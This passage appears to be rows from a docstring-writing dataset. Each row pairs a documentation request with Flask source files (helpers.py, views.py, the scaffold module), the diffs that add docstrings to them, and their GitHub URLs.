+ able to, otherwise attach an etag yourself.
+
+ .. versionchanged:: 0.5
+ The ``add_etags``, ``cache_timeout`` and ``conditional``
+ parameters were added. The default behavior is to add etags.
+
+ .. versionadded:: 0.2
+ """
return werkzeug.utils.send_file( # type: ignore[return-value]
**_prepare_send_file_kwargs(
path_or_file=path_or_file,
@@ -215,12 +545,54 @@ path: os.PathLike[str] | str,
**kwargs: t.Any,
) -> Response:
+ """Send a file from within a directory using :func:`send_file`.
+
+ .. code-block:: python
+
+ @app.route("/uploads/<path:name>")
+ def download_file(name):
+ return send_from_directory(
+ app.config['UPLOAD_FOLDER'], name, as_attachment=True
+ )
+
+ This is a secure way to serve files from a folder, such as static
+ files or uploads. Uses :func:`~werkzeug.security.safe_join` to
+ ensure the path coming from the client is not maliciously crafted to
+ point outside the specified directory.
+
+ If the final path does not point to an existing regular file,
+ raises a 404 :exc:`~werkzeug.exceptions.NotFound` error.
+
+ :param directory: The directory that ``path`` must be located under,
+ relative to the current application's root path. This *must not*
+ be a value provided by the client, otherwise it becomes insecure.
+ :param path: The path to the file to send, relative to
+ ``directory``.
+ :param kwargs: Arguments to pass to :func:`send_file`.
+
+ .. versionchanged:: 2.0
+ ``path`` replaces the ``filename`` parameter.
+
+ .. versionadded:: 2.0
+ Moved the implementation to Werkzeug. This is now a wrapper to
+ pass some Flask-specific arguments.
+
+ .. versionadded:: 0.5
+ """
return werkzeug.utils.send_from_directory( # type: ignore[return-value]
directory, path, **_prepare_send_file_kwargs(**kwargs)
)
def get_root_path(import_name: str) -> str:
+ """Find the root path of a package, or the path that contains a
+ module. If it cannot be found, returns the current working
+ directory.
+
+ Not to be confused with the value returned by :func:`find_package`.
+
+ :meta private:
+ """
# Module already imported and has a file attribute. Use that first.
mod = sys.modules.get(import_name)
@@ -280,6 +652,9 @@
class _CollectErrors:
+ """A context manager that records and silences an error raised within it.
+ Used to run all teardown functions, then raise any errors afterward.
+ """
def __init__(self) -> None:
self.errors: list[BaseException] = []
@@ -299,8 +674,9 @@ return True
def raise_any(self, message: str) -> None:
+ """Raise if any errors were collected."""
if self.errors:
if sys.version_info >= (3, 11):
raise BaseExceptionGroup(message, self.errors) # noqa: F821
else:
- raise self.errors[0]+ raise self.errors[0]
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/helpers.py |
Fully document this Python code with docstrings | from __future__ import annotations
import typing as t
from . import typing as ft
from .globals import current_app
from .globals import request
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
http_method_funcs = frozenset(
["get", "post", "head", "options", "delete", "put", "trace", "patch"]
)
class View:
#: The methods this view is registered for. Uses the same default
#: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and
#: ``add_url_rule`` by default.
methods: t.ClassVar[t.Collection[str] | None] = None
#: Control whether the ``OPTIONS`` method is handled automatically.
#: Uses the same default (``True``) as ``route`` and
#: ``add_url_rule`` by default.
provide_automatic_options: t.ClassVar[bool | None] = None
#: A list of decorators to apply, in order, to the generated view
#: function. Remember that ``@decorator`` syntax is applied bottom
#: to top, so the first decorator in the list would be the bottom
#: decorator.
#:
#: .. versionadded:: 0.8
decorators: t.ClassVar[list[t.Callable[..., t.Any]]] = []
#: Create a new instance of this view class for every request by
#: default. If a view subclass sets this to ``False``, the same
#: instance is used for every request.
#:
#: A single instance is more efficient, especially if complex setup
#: is done during init. However, storing data on ``self`` is no
#: longer safe across requests, and :data:`~flask.g` should be used
#: instead.
#:
#: .. versionadded:: 2.2
init_every_request: t.ClassVar[bool] = True
def dispatch_request(self) -> ft.ResponseReturnValue:
raise NotImplementedError()
@classmethod
def as_view(
cls, name: str, *class_args: t.Any, **class_kwargs: t.Any
) -> ft.RouteCallable:
if cls.init_every_request:
def view(**kwargs: t.Any) -> ft.ResponseReturnValue:
self = view.view_class( # type: ignore[attr-defined]
*class_args, **class_kwargs
)
return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return]
else:
self = cls(*class_args, **class_kwargs) # pyright: ignore
def view(**kwargs: t.Any) -> ft.ResponseReturnValue:
return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return]
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# We attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls # type: ignore
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods # type: ignore
view.provide_automatic_options = cls.provide_automatic_options # type: ignore
return view
class MethodView(View):
def __init_subclass__(cls, **kwargs: t.Any) -> None:
super().__init_subclass__(**kwargs)
if "methods" not in cls.__dict__:
methods = set()
for base in cls.__bases__:
if getattr(base, "methods", None):
methods.update(base.methods) # type: ignore[attr-defined]
for key in http_method_funcs:
if hasattr(cls, key):
methods.add(key.upper())
if methods:
cls.methods = methods
def dispatch_request(self, **kwargs: t.Any) -> ft.ResponseReturnValue:
meth = getattr(self, request.method.lower(), None)
# If the request method is HEAD and we don't have a handler for it
# retry with GET.
if meth is None and request.method == "HEAD":
meth = getattr(self, "get", None)
assert meth is not None, f"Unimplemented method {request.method!r}"
return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return] | --- +++ @@ -14,6 +14,36 @@
class View:
+ """Subclass this class and override :meth:`dispatch_request` to
+ create a generic class-based view. Call :meth:`as_view` to create a
+ view function that creates an instance of the class with the given
+ arguments and calls its ``dispatch_request`` method with any URL
+ variables.
+
+ See :doc:`views` for a detailed guide.
+
+ .. code-block:: python
+
+ class Hello(View):
+ init_every_request = False
+
+ def dispatch_request(self, name):
+ return f"Hello, {name}!"
+
+ app.add_url_rule(
+ "/hello/<name>", view_func=Hello.as_view("hello")
+ )
+
+ Set :attr:`methods` on the class to change what methods the view
+ accepts.
+
+ Set :attr:`decorators` on the class to apply a list of decorators to
+ the generated view function. Decorators applied to the class itself
+ will not be applied to the generated view function!
+
+ Set :attr:`init_every_request` to ``False`` for efficiency, unless
+ you need to store request-global data on ``self``.
+ """
#: The methods this view is registered for. Uses the same default
#: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and
@@ -46,12 +76,31 @@ init_every_request: t.ClassVar[bool] = True
def dispatch_request(self) -> ft.ResponseReturnValue:
+ """The actual view function behavior. Subclasses must override
+ this and return a valid response. Any variables from the URL
+ rule are passed as keyword arguments.
+ """
raise NotImplementedError()
@classmethod
def as_view(
cls, name: str, *class_args: t.Any, **class_kwargs: t.Any
) -> ft.RouteCallable:
+ """Convert the class into a view function that can be registered
+ for a route.
+
+ By default, the generated view will create a new instance of the
+ view class for every request and call its
+ :meth:`dispatch_request` method. If the view class sets
+ :attr:`init_every_request` to ``False``, the same instance will
+ be used for every request.
+
+ Except for ``name``, all other arguments passed to this method
+ are forwarded to the view class ``__init__`` method.
+
+ .. versionchanged:: 2.2
+ Added the ``init_every_request`` class attribute.
+ """
if cls.init_every_request:
def view(**kwargs: t.Any) -> ft.ResponseReturnValue:
@@ -87,6 +136,31 @@
class MethodView(View):
+ """Dispatches request methods to the corresponding instance methods.
+ For example, if you implement a ``get`` method, it will be used to
+ handle ``GET`` requests.
+
+ This can be useful for defining a REST API.
+
+ :attr:`methods` is automatically set based on the methods defined on
+ the class.
+
+ See :doc:`views` for a detailed guide.
+
+ .. code-block:: python
+
+ class CounterAPI(MethodView):
+ def get(self):
+ return str(session.get("counter", 0))
+
+ def post(self):
+ session["counter"] = session.get("counter", 0) + 1
+ return redirect(url_for("counter"))
+
+ app.add_url_rule(
+ "/counter", view_func=CounterAPI.as_view("counter")
+ )
+ """
def __init_subclass__(cls, **kwargs: t.Any) -> None:
super().__init_subclass__(**kwargs)
@@ -114,4 +188,4 @@ meth = getattr(self, "get", None)
assert meth is not None, f"Unimplemented method {request.method!r}"
- return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return]+ return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return]
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/views.py |
Can you add docstrings to this Python file? | from __future__ import annotations
import importlib.util
import os
import pathlib
import sys
import typing as t
from collections import defaultdict
from functools import update_wrapper
from jinja2 import BaseLoader
from jinja2 import FileSystemLoader
from werkzeug.exceptions import default_exceptions
from werkzeug.exceptions import HTTPException
from werkzeug.utils import cached_property
from .. import typing as ft
from ..helpers import get_root_path
from ..templating import _default_template_ctx_processor
if t.TYPE_CHECKING: # pragma: no cover
from click import Group
# a singleton sentinel value for parameter defaults
_sentinel = object()
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any])
T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable)
T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_context_processor = t.TypeVar(
"T_template_context_processor", bound=ft.TemplateContextProcessorCallable
)
T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable)
T_url_value_preprocessor = t.TypeVar(
"T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable
)
T_route = t.TypeVar("T_route", bound=ft.RouteCallable)
def setupmethod(f: F) -> F:
f_name = f.__name__
def wrapper_func(self: Scaffold, *args: t.Any, **kwargs: t.Any) -> t.Any:
self._check_setup_finished(f_name)
return f(self, *args, **kwargs)
return t.cast(F, update_wrapper(wrapper_func, f))
class Scaffold:
    """Common behavior shared between :class:`~flask.Flask` and
    :class:`~flask.blueprints.Blueprint`.

    :param import_name: The import name of the module where this object
        is defined. Usually :attr:`__name__` should be used.
    :param static_folder: Path to a folder of static files to serve.
        If this is set, a static route will be added.
    :param static_url_path: URL prefix for the static route.
    :param template_folder: Path to a folder containing template files
        for rendering. If this is set, a Jinja loader will be added.
    :param root_path: The path that static, template, and resource files
        are relative to. Typically not set, it is discovered based on
        the ``import_name``.

    .. versionadded:: 2.0
    """

    #: Click command group for registering CLI commands; assigned by
    #: subclasses (declared here for typing only).
    cli: Group

    #: The name used to identify this object, e.g. as the ``scope`` key
    #: in the registration dicts below; assigned by subclasses.
    name: str

    #: Backing field for :attr:`static_folder`; stored relative to
    #: :attr:`root_path` (or absolute), with trailing slashes stripped.
    _static_folder: str | None = None
    #: Backing field for :attr:`static_url_path`; ``None`` means derive
    #: the value from :attr:`static_folder`.
    _static_url_path: str | None = None

    def __init__(
        self,
        import_name: str,
        static_folder: str | os.PathLike[str] | None = None,
        static_url_path: str | None = None,
        template_folder: str | os.PathLike[str] | None = None,
        root_path: str | None = None,
    ):
        #: The name of the package or module that this object belongs
        #: to. Do not change this once it is set by the constructor.
        self.import_name = import_name

        self.static_folder = static_folder
        self.static_url_path = static_url_path

        #: The path to the templates folder, relative to
        #: :attr:`root_path`, to add to the template loader. ``None`` if
        #: templates should not be added.
        self.template_folder = template_folder

        if root_path is None:
            root_path = get_root_path(self.import_name)

        #: Absolute path to the package on the filesystem. Used to look
        #: up resources contained in the package.
        self.root_path = root_path

        #: A dictionary mapping endpoint names to view functions.
        #:
        #: To register a view function, use the :meth:`route` decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.view_functions: dict[str, ft.RouteCallable] = {}

        #: A data structure of registered error handlers, in the format
        #: ``{scope: {code: {class: handler}}}``. The ``scope`` key is
        #: the name of a blueprint the handlers are active for, or
        #: ``None`` for all requests. The ``code`` key is the HTTP
        #: status code for ``HTTPException``, or ``None`` for
        #: other exceptions. The innermost dictionary maps exception
        #: classes to handler functions.
        #:
        #: To register an error handler, use the :meth:`errorhandler`
        #: decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.error_handler_spec: dict[
            ft.AppOrBlueprintKey,
            dict[int | None, dict[type[Exception], ft.ErrorHandlerCallable]],
        ] = defaultdict(lambda: defaultdict(dict))

        #: A data structure of functions to call at the beginning of
        #: each request, in the format ``{scope: [functions]}``. The
        #: ``scope`` key is the name of a blueprint the functions are
        #: active for, or ``None`` for all requests.
        #:
        #: To register a function, use the :meth:`before_request`
        #: decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.before_request_funcs: dict[
            ft.AppOrBlueprintKey, list[ft.BeforeRequestCallable]
        ] = defaultdict(list)

        #: A data structure of functions to call at the end of each
        #: request, in the format ``{scope: [functions]}``. The
        #: ``scope`` key is the name of a blueprint the functions are
        #: active for, or ``None`` for all requests.
        #:
        #: To register a function, use the :meth:`after_request`
        #: decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.after_request_funcs: dict[
            ft.AppOrBlueprintKey, list[ft.AfterRequestCallable[t.Any]]
        ] = defaultdict(list)

        #: A data structure of functions to call at the end of each
        #: request even if an exception is raised, in the format
        #: ``{scope: [functions]}``. The ``scope`` key is the name of a
        #: blueprint the functions are active for, or ``None`` for all
        #: requests.
        #:
        #: To register a function, use the :meth:`teardown_request`
        #: decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.teardown_request_funcs: dict[
            ft.AppOrBlueprintKey, list[ft.TeardownCallable]
        ] = defaultdict(list)

        #: A data structure of functions to call to pass extra context
        #: values when rendering templates, in the format
        #: ``{scope: [functions]}``. The ``scope`` key is the name of a
        #: blueprint the functions are active for, or ``None`` for all
        #: requests.
        #:
        #: To register a function, use the :meth:`context_processor`
        #: decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.template_context_processors: dict[
            ft.AppOrBlueprintKey, list[ft.TemplateContextProcessorCallable]
        ] = defaultdict(list, {None: [_default_template_ctx_processor]})

        #: A data structure of functions to call to modify the keyword
        #: arguments passed to the view function, in the format
        #: ``{scope: [functions]}``. The ``scope`` key is the name of a
        #: blueprint the functions are active for, or ``None`` for all
        #: requests.
        #:
        #: To register a function, use the
        #: :meth:`url_value_preprocessor` decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.url_value_preprocessors: dict[
            ft.AppOrBlueprintKey,
            list[ft.URLValuePreprocessorCallable],
        ] = defaultdict(list)

        #: A data structure of functions to call to modify the keyword
        #: arguments when generating URLs, in the format
        #: ``{scope: [functions]}``. The ``scope`` key is the name of a
        #: blueprint the functions are active for, or ``None`` for all
        #: requests.
        #:
        #: To register a function, use the :meth:`url_defaults`
        #: decorator.
        #:
        #: This data structure is internal. It should not be modified
        #: directly and its format may change at any time.
        self.url_default_functions: dict[
            ft.AppOrBlueprintKey, list[ft.URLDefaultCallable]
        ] = defaultdict(list)

    def __repr__(self) -> str:
        """Return a debug representation like ``<ClassName 'name'>``."""
        return f"<{type(self).__name__} {self.name!r}>"

    def _check_setup_finished(self, f_name: str) -> None:
        """Hook called by :func:`setupmethod` wrappers before a setup
        method named ``f_name`` runs.

        Subclasses implement this to raise an error once it is too late
        to register new setup code; this base implementation is
        abstract.
        """
        raise NotImplementedError

    @property
    def static_folder(self) -> str | None:
        """The absolute path to the configured static folder. ``None``
        if no static folder is set.
        """
        if self._static_folder is not None:
            return os.path.join(self.root_path, self._static_folder)
        else:
            return None

    @static_folder.setter
    def static_folder(self, value: str | os.PathLike[str] | None) -> None:
        # Strip trailing slashes/backslashes so joins behave
        # predictably. Edge case: a bare "/" or "\\" collapses to the
        # empty string, which then joins to root_path itself.
        if value is not None:
            value = os.fspath(value).rstrip(r"\/")

        self._static_folder = value

    @property
    def has_static_folder(self) -> bool:
        """``True`` if :attr:`static_folder` is set.

        .. versionadded:: 0.5
        """
        return self.static_folder is not None

    @property
    def static_url_path(self) -> str | None:
        """The URL prefix that the static route will be accessible from.

        If it was not configured during init, it is derived from
        :attr:`static_folder` by taking the folder's basename. ``None``
        if neither was configured. Edge case: the ``rstrip("/")`` means
        an empty basename yields ``""`` rather than ``"/"``.
        """
        if self._static_url_path is not None:
            return self._static_url_path

        if self.static_folder is not None:
            basename = os.path.basename(self.static_folder)
            return f"/{basename}".rstrip("/")

        return None

    @static_url_path.setter
    def static_url_path(self, value: str | None) -> None:
        # Trailing slashes are stripped; a bare "/" becomes "".
        if value is not None:
            value = value.rstrip("/")

        self._static_url_path = value

    @cached_property
    def jinja_loader(self) -> BaseLoader | None:
        """The Jinja loader for this object's templates. By default this
        is a :class:`jinja2.loaders.FileSystemLoader` for
        :attr:`template_folder` if it is set, otherwise ``None``.

        Cached: changing :attr:`template_folder` afterwards has no
        effect on an already-computed loader.

        .. versionadded:: 0.5
        """
        if self.template_folder is not None:
            return FileSystemLoader(os.path.join(self.root_path, self.template_folder))
        else:
            return None

    def _method_route(
        self,
        method: str,
        rule: str,
        options: dict[str, t.Any],
    ) -> t.Callable[[T_route], T_route]:
        """Build a :meth:`route` decorator restricted to one HTTP
        ``method``.

        :raises TypeError: if ``options`` also contains ``methods`` —
            the single-method shortcuts do not accept it.
        """
        if "methods" in options:
            raise TypeError("Use the 'route' decorator to use the 'methods' argument.")

        return self.route(rule, methods=[method], **options)

    @setupmethod
    def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
        """Shortcut for :meth:`route` with ``methods=["GET"]``.

        .. versionadded:: 2.0
        """
        return self._method_route("GET", rule, options)

    @setupmethod
    def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
        """Shortcut for :meth:`route` with ``methods=["POST"]``.

        .. versionadded:: 2.0
        """
        return self._method_route("POST", rule, options)

    @setupmethod
    def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
        """Shortcut for :meth:`route` with ``methods=["PUT"]``.

        .. versionadded:: 2.0
        """
        return self._method_route("PUT", rule, options)

    @setupmethod
    def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
        """Shortcut for :meth:`route` with ``methods=["DELETE"]``.

        .. versionadded:: 2.0
        """
        return self._method_route("DELETE", rule, options)

    @setupmethod
    def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
        """Shortcut for :meth:`route` with ``methods=["PATCH"]``.

        .. versionadded:: 2.0
        """
        return self._method_route("PATCH", rule, options)

    @setupmethod
    def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
        """Decorate a view function to register it with the given URL
        rule and options. Calls :meth:`add_url_rule`, which has more
        details about the implementation.

        .. code-block:: python

            @app.route("/")
            def index():
                return "Hello, World!"

        The endpoint name for the route defaults to the name of the view
        function if the ``endpoint`` parameter isn't passed.

        :param rule: The URL rule string.
        :param options: Extra options passed to the
            :class:`~werkzeug.routing.Rule` object.
        """
        def decorator(f: T_route) -> T_route:
            endpoint = options.pop("endpoint", None)
            self.add_url_rule(rule, endpoint, f, **options)
            return f

        return decorator

    @setupmethod
    def add_url_rule(
        self,
        rule: str,
        endpoint: str | None = None,
        view_func: ft.RouteCallable | None = None,
        provide_automatic_options: bool | None = None,
        **options: t.Any,
    ) -> None:
        """Register a rule for routing incoming requests and building
        URLs. The :meth:`route` decorator is a shortcut to call this
        with the ``view_func`` argument. These are equivalent:

        .. code-block:: python

            @app.route("/")
            def index():
                ...

        .. code-block:: python

            def index():
                ...

            app.add_url_rule("/", view_func=index)

        The endpoint name for the route defaults to the name of the view
        function if the ``endpoint`` parameter isn't passed.

        ``view_func`` does not necessarily need to be passed, but if the
        rule should participate in routing an endpoint name must be
        associated with a view function at some point with the
        :meth:`endpoint` decorator.

        Abstract here; subclasses provide the implementation.

        :param rule: The URL rule string.
        :param endpoint: The endpoint name to associate with the rule
            and view function. Used when routing and building URLs.
            Defaults to ``view_func.__name__``.
        :param view_func: The view function to associate with the
            endpoint name.
        :param provide_automatic_options: Add the ``OPTIONS`` method and
            respond to ``OPTIONS`` requests automatically.
        :param options: Extra options passed to the
            :class:`~werkzeug.routing.Rule` object.
        """
        raise NotImplementedError

    @setupmethod
    def endpoint(self, endpoint: str) -> t.Callable[[F], F]:
        """Decorate a view function to register it for the given
        endpoint. Used if a rule is added without a ``view_func`` with
        :meth:`add_url_rule`.

        .. code-block:: python

            app.add_url_rule("/ex", endpoint="example")

            @app.endpoint("example")
            def example():
                ...

        Edge case: registering a second function for the same endpoint
        silently replaces the first.

        :param endpoint: The endpoint name to associate with the view
            function.
        """
        def decorator(f: F) -> F:
            self.view_functions[endpoint] = f
            return f

        return decorator

    @setupmethod
    def before_request(self, f: T_before_request) -> T_before_request:
        """Register a function to run before each request.

        The function will be called without any arguments. If it returns
        a non-``None`` value, the value is handled as if it was the
        return value from the view, and further request handling is
        stopped.

        Functions are stored under the ``None`` scope here, so on a
        blueprint this only applies to requests that the blueprint
        handles.
        """
        self.before_request_funcs.setdefault(None, []).append(f)
        return f

    @setupmethod
    def after_request(self, f: T_after_request) -> T_after_request:
        """Register a function to run after each request to this object.

        The function is called with the response object, and must return
        a response object. This allows the functions to modify or
        replace the response before it is sent.

        If a function raises an exception, any remaining
        ``after_request`` functions will not be called. Therefore, this
        should not be used for actions that must execute, such as to
        close resources. Use :meth:`teardown_request` for that.
        """
        self.after_request_funcs.setdefault(None, []).append(f)
        return f

    @setupmethod
    def teardown_request(self, f: T_teardown) -> T_teardown:
        """Register a function to be called when the request context is
        popped, even if an exception was raised.

        When a teardown function was called because of an unhandled
        exception it will be passed an error object; otherwise it
        receives ``None``. The return values of teardown functions are
        ignored, so teardown functions must avoid raising exceptions
        themselves.
        """
        self.teardown_request_funcs.setdefault(None, []).append(f)
        return f

    @setupmethod
    def context_processor(
        self,
        f: T_template_context_processor,
    ) -> T_template_context_processor:
        """Registers a template context processor function. These
        functions run before rendering a template. The keys of the
        returned dict are added as variables available in the template.
        """
        self.template_context_processors[None].append(f)
        return f

    @setupmethod
    def url_value_preprocessor(
        self,
        f: T_url_value_preprocessor,
    ) -> T_url_value_preprocessor:
        """Register a URL value preprocessor function for all view
        functions in the application.

        The function can modify the values captured from the matched url
        before they are passed to the view. The function is passed the
        endpoint name and values dict. The return value is ignored.
        """
        self.url_value_preprocessors[None].append(f)
        return f

    @setupmethod
    def url_defaults(self, f: T_url_defaults) -> T_url_defaults:
        """Callback function for URL defaults for all view functions of
        the application. It's called with the endpoint and values and
        should update the values passed in place.
        """
        self.url_default_functions[None].append(f)
        return f

    @setupmethod
    def errorhandler(
        self, code_or_exception: type[Exception] | int
    ) -> t.Callable[[T_error_handler], T_error_handler]:
        """Register a function to handle errors by code or exception
        class.

        A decorator that is used to register a function given an
        error code. Example::

            @app.errorhandler(404)
            def page_not_found(error):
                return 'This page does not exist', 404

        You can also register handlers for arbitrary exceptions::

            @app.errorhandler(DatabaseError)
            def special_exception_handler(error):
                return 'Database connection failed', 500

        :param code_or_exception: the code as integer for the handler,
            or an arbitrary exception class
        """
        def decorator(f: T_error_handler) -> T_error_handler:
            self.register_error_handler(code_or_exception, f)
            return f

        return decorator

    @setupmethod
    def register_error_handler(
        self,
        code_or_exception: type[Exception] | int,
        f: ft.ErrorHandlerCallable,
    ) -> None:
        """Alternative error attach function to the :meth:`errorhandler`
        decorator that is more straightforward to use for non decorator
        usage.

        See :meth:`_get_exc_class_and_code` for the errors raised on
        invalid ``code_or_exception`` values.
        """
        exc_class, code = self._get_exc_class_and_code(code_or_exception)
        self.error_handler_spec[None][code][exc_class] = f

    @staticmethod
    def _get_exc_class_and_code(
        exc_class_or_code: type[Exception] | int,
    ) -> tuple[type[Exception], int | None]:
        """Get the exception class being handled. For HTTP status codes
        or ``HTTPException`` subclasses, return both the exception and
        status code; for other exceptions the code is ``None``.

        Edge cases:

        * an integer that is not a recognized HTTP error code raises
          :exc:`ValueError`;
        * an exception *instance* (rather than a class) raises
          :exc:`TypeError`;
        * a class that is not a subclass of :exc:`Exception` raises
          :exc:`ValueError`.

        :param exc_class_or_code: Any exception class, or an HTTP status
            code as an integer.
        """
        exc_class: type[Exception]

        if isinstance(exc_class_or_code, int):
            try:
                exc_class = default_exceptions[exc_class_or_code]
            except KeyError:
                raise ValueError(
                    f"'{exc_class_or_code}' is not a recognized HTTP"
                    " error code. Use a subclass of HTTPException with"
                    " that code instead."
                ) from None
        else:
            exc_class = exc_class_or_code

        if isinstance(exc_class, Exception):
            raise TypeError(
                f"{exc_class!r} is an instance, not a class. Handlers"
                " can only be registered for Exception classes or HTTP"
                " error codes."
            )

        if not issubclass(exc_class, Exception):
            raise ValueError(
                f"'{exc_class.__name__}' is not a subclass of Exception."
                " Handlers can only be registered for Exception classes"
                " or HTTP error codes."
            )

        if issubclass(exc_class, HTTPException):
            return exc_class, exc_class.code
        else:
            return exc_class, None
def _endpoint_from_view_func(view_func: ft.RouteCallable) -> str:
assert view_func is not None, "expected view func if endpoint is not provided."
return view_func.__name__
def _find_package_path(import_name: str) -> str:
    """Find the path that contains the package or module for
    ``import_name``.

    Edge cases: if the root module's spec cannot be found (invalid name,
    ``__main__``, or ``find_spec`` returning ``None``), the current
    working directory is returned instead of raising.
    """
    root_mod_name, _, _ = import_name.partition(".")

    try:
        root_spec = importlib.util.find_spec(root_mod_name)

        if root_spec is None:
            raise ValueError("not found")
    except (ImportError, ValueError):
        # ImportError: the machinery told us it does not exist
        # ValueError:
        #     - the module name was invalid
        #     - the module name is __main__
        #     - we raised `ValueError` due to `root_spec` being `None`
        return os.getcwd()

    if root_spec.submodule_search_locations:
        if root_spec.origin is None or root_spec.origin == "namespace":
            # namespace package: may have multiple search locations
            package_spec = importlib.util.find_spec(import_name)

            if package_spec is not None and package_spec.submodule_search_locations:
                # Pick the path in the namespace that contains the submodule.
                package_path = pathlib.Path(
                    os.path.commonpath(package_spec.submodule_search_locations)
                )
                # NOTE: next() assumes one of the root's locations
                # contains the submodule path; StopIteration would
                # propagate otherwise.
                search_location = next(
                    location
                    for location in root_spec.submodule_search_locations
                    if package_path.is_relative_to(location)
                )
            else:
                # Pick the first path.
                search_location = root_spec.submodule_search_locations[0]

            return os.path.dirname(search_location)
        else:
            # package with __init__.py: origin is the __init__.py file,
            # so go up two levels to the directory containing the package
            return os.path.dirname(os.path.dirname(root_spec.origin))
    else:
        # plain module: directory containing the module file
        return os.path.dirname(root_spec.origin)  # type: ignore[type-var, return-value]
def find_package(import_name: str) -> tuple[str | None, str]:
    """Find the prefix that a package is installed under, and the path
    that it would be imported from.

    The prefix is the directory containing the standard directory
    hierarchy (lib, bin, etc.). If the package is not installed to the
    system (:attr:`sys.prefix`) or a virtualenv (``site-packages``),
    ``None`` is returned for the prefix.
    """
    package_path = _find_package_path(import_name)
    sys_prefix = os.path.abspath(sys.prefix)

    if pathlib.PurePath(package_path).is_relative_to(sys_prefix):
        # Installed directly under the interpreter prefix.
        return sys_prefix, package_path

    containing_dir, last_part = os.path.split(package_path)

    if last_part.lower() != "site-packages":
        # Not inside a site-packages directory: treat as not installed.
        return None, package_path

    grandparent, lib_part = os.path.split(containing_dir)

    if lib_part.lower() == "lib":
        # Windows layout (prefix/lib/site-packages)
        return grandparent, package_path

    if os.path.basename(grandparent).lower() == "lib":
        # Unix layout (prefix/lib/pythonX.Y/site-packages)
        return os.path.dirname(grandparent), package_path

    # Some other layout (prefix/site-packages)
    return containing_dir, package_path
class Scaffold:
+ """Common behavior shared between :class:`~flask.Flask` and
+ :class:`~flask.blueprints.Blueprint`.
+
+ :param import_name: The import name of the module where this object
+ is defined. Usually :attr:`__name__` should be used.
+ :param static_folder: Path to a folder of static files to serve.
+ If this is set, a static route will be added.
+ :param static_url_path: URL prefix for the static route.
+ :param template_folder: Path to a folder containing template files.
+ for rendering. If this is set, a Jinja loader will be added.
+ :param root_path: The path that static, template, and resource files
+ are relative to. Typically not set, it is discovered based on
+ the ``import_name``.
+
+ .. versionadded:: 2.0
+ """
cli: Group
name: str
@@ -206,6 +222,9 @@
@property
def static_folder(self) -> str | None:
+ """The absolute path to the configured static folder. ``None``
+ if no static folder is set.
+ """
if self._static_folder is not None:
return os.path.join(self.root_path, self._static_folder)
else:
@@ -220,10 +239,19 @@
@property
def has_static_folder(self) -> bool:
+ """``True`` if :attr:`static_folder` is set.
+
+ .. versionadded:: 0.5
+ """
return self.static_folder is not None
@property
def static_url_path(self) -> str | None:
+ """The URL prefix that the static route will be accessible from.
+
+ If it was not configured during init, it is derived from
+ :attr:`static_folder`.
+ """
if self._static_url_path is not None:
return self._static_url_path
@@ -242,6 +270,12 @@
@cached_property
def jinja_loader(self) -> BaseLoader | None:
+ """The Jinja loader for this object's templates. By default this
+ is a class :class:`jinja2.loaders.FileSystemLoader` to
+ :attr:`template_folder` if it is set.
+
+ .. versionadded:: 0.5
+ """
if self.template_folder is not None:
return FileSystemLoader(os.path.join(self.root_path, self.template_folder))
else:
@@ -260,26 +294,68 @@
@setupmethod
def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["GET"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("GET", rule, options)
@setupmethod
def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["POST"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("POST", rule, options)
@setupmethod
def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["PUT"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("PUT", rule, options)
@setupmethod
def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["DELETE"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("DELETE", rule, options)
@setupmethod
def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
